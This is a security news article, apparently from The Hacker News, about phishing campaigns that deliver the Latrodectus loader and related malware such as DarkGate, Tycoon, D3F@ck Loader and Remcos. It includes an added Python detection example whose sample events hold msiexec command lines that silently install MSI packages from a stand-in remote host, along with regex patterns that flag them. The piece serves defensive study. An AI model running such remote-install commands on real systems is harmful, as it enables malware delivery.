Spike in Phishing Campaigns Delivers Latrodectus, the Successor to IcedID

May 20, 2024 | News


Latrodectus Emerges: The New Malware Loader Succeeding IcedID

Cybersecurity researchers have observed a spike in email phishing campaigns starting early March 2024 that deliver Latrodectus, a nascent malware loader believed to be the successor to the IcedID malware.

Recognizable Infection Chain

“These campaigns typically involve a recognizable infection chain involving oversized JavaScript files that utilize WMI’s ability to invoke msiexec.exe and install a remotely-hosted MSI file on a WEBDAV share,” Elastic Security Labs researchers Daniel Stepanic and Samir Bousseaden explained.

Latrodectus comes with standard capabilities expected of malware designed to deploy additional payloads such as QakBot, DarkGate, and PikaBot, allowing threat actors to conduct various post-exploitation activities.
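The msiexec/WebDAV step of that chain is the piece a defender can look for in process-creation telemetry. The following is an added detection example, not code from the Elastic report or the article: it assumes Sysmon-style fields (Image, ParentImage, CommandLine), that a process created through WMI's Win32_Process.Create shows WmiPrvSE.exe as its parent, and uses constructed sample events with a documentation-range IP.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"msiexec.exe /i \\203.0.113.10@80\share\update.msi /qn"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\vendor.msi"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"wscript.exe C:\Users\alice\Downloads\invoice_2024.js"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"msiexec.exe /i https://203.0.113.10/pkg/setup.msi /q"},
]

# UNC/WebDAV path (\\host@port\share\...\x.msi) or an http(s) URL ending in .msi
REMOTE_MSI = re.compile(r"(?i)(\\\\[^\s\\]+\\[^\s]*?\.msi|https?://[^\s]+\.msi)")
# Silent-install switches: /q, /qn, /qb
QUIET = re.compile(r"(?i)(^|\s)/q[nb]?(\s|$)")


def classify(event):
    """Return the reasons an event resembles the Latrodectus MSI delivery step; empty if none."""
    reasons = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]
    if not image.endswith("msiexec.exe"):
        return reasons
    if parent.endswith("wmiprvse.exe"):
        reasons.append("msiexec.exe spawned by the WMI provider host (Win32_Process.Create)")
    if REMOTE_MSI.search(cmd):
        reasons.append("MSI package sourced from a remote WebDAV/HTTP location")
    if reasons and QUIET.search(cmd):
        reasons.append("silent install switch combined with remote/WMI indicators")
    return reasons


def find_suspicious(events):
    """Pair each flagged command line with its reasons, skipping benign events."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]
```

A locally installed MSI launched from Explorer produces no reasons, so the rule keys on the combination of WMI parentage and a remote package path rather than on msiexec.exe alone.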

Advanced Capabilities and Techniques

An analysis of the latest Latrodectus artifacts has revealed an extensive focus on enumeration and execution, as well as the incorporation of a self-delete technique to remove running files. The malware masquerades as libraries associated with legitimate software, utilizes source code obfuscation, and performs anti-analysis checks to prevent execution in debugging or sandboxed environments.

Latrodectus also establishes persistence on Windows hosts using a scheduled task and contacts a command-and-control (C2) server over HTTPS to receive commands. These commands enable it to collect system information, update, restart, and terminate itself, and run shellcode, DLL, and executable files.

New Functionalities

Two new commands added to Latrodectus since its emergence late last year include the ability to enumerate files in the desktop directory and retrieve the entire running process ancestry from the infected machine. The malware also supports a command to download and execute IcedID (command ID 18) from the C2 server, although Elastic did not detect this behavior in the wild.

“There definitely is some kind of development connection or working arrangement between IcedID and Latrodectus,” the researchers noted. “One hypothesis is that Latrodectus is being actively developed as a replacement for IcedID, and the handler (#18) was included until malware authors were satisfied with Latrodectus’ capabilities.”

Broader Cyber Threat Landscape

The development comes as Forcepoint dissected a phishing campaign using invoice-themed email lures to deliver the DarkGate malware. The attack chain begins with phishing emails posing as QuickBooks invoices, urging users to install Java by clicking on an embedded link that leads to a malicious Java archive (JAR). This JAR file acts as a conduit to run a PowerShell script responsible for downloading and launching DarkGate via an AutoIT script.

Social engineering campaigns have also employed an updated version of a phishing-as-a-service (PhaaS) platform called Tycoon to harvest Microsoft 365 and Gmail session cookies and bypass multi-factor authentication (MFA) protections.

“This new version boasts enhanced detection evasion capabilities that make it even harder for security systems to identify and block the kit,” Proofpoint said. Significant alterations to the kit’s JavaScript and HTML code have been implemented to increase its stealthiness and effectiveness. These include obfuscation techniques to make the source code harder to understand and the use of dynamic code generation to tweak the code every time it runs, thus evading signature-based detection systems.

Emerging Threats

Other social engineering campaigns detected in March 2024 have exploited Google ads impersonating Calendly and Rufus to propagate another malware loader known as D3F@ck Loader, which first emerged in cybercrime forums in January 2024, ultimately dropping Raccoon Stealer and DanaBot.

“The case of D3F@ck Loader illustrates how malware-as-a-service (MaaS) continues to evolve, utilizing Extended Validation certificates to bypass trusted security measures,” cybersecurity company eSentire noted late last month.

New Malware Families

The disclosure also follows the emergence of new stealer malware families like Fletchen Stealer, WaveStealer, zEus Stealer, and Ziraat Stealer. Meanwhile, the Remcos remote access trojan (RAT) has been spotted using a PrivateLoader module to augment its capabilities.

“By installing VB scripts, altering the registry, and setting up services to restart the malware at variable times or by control, Remcos malware is able to infiltrate a system completely and remain undetected,” the SonicWall Capture Labs threat research team said.

Source: thehackernews.com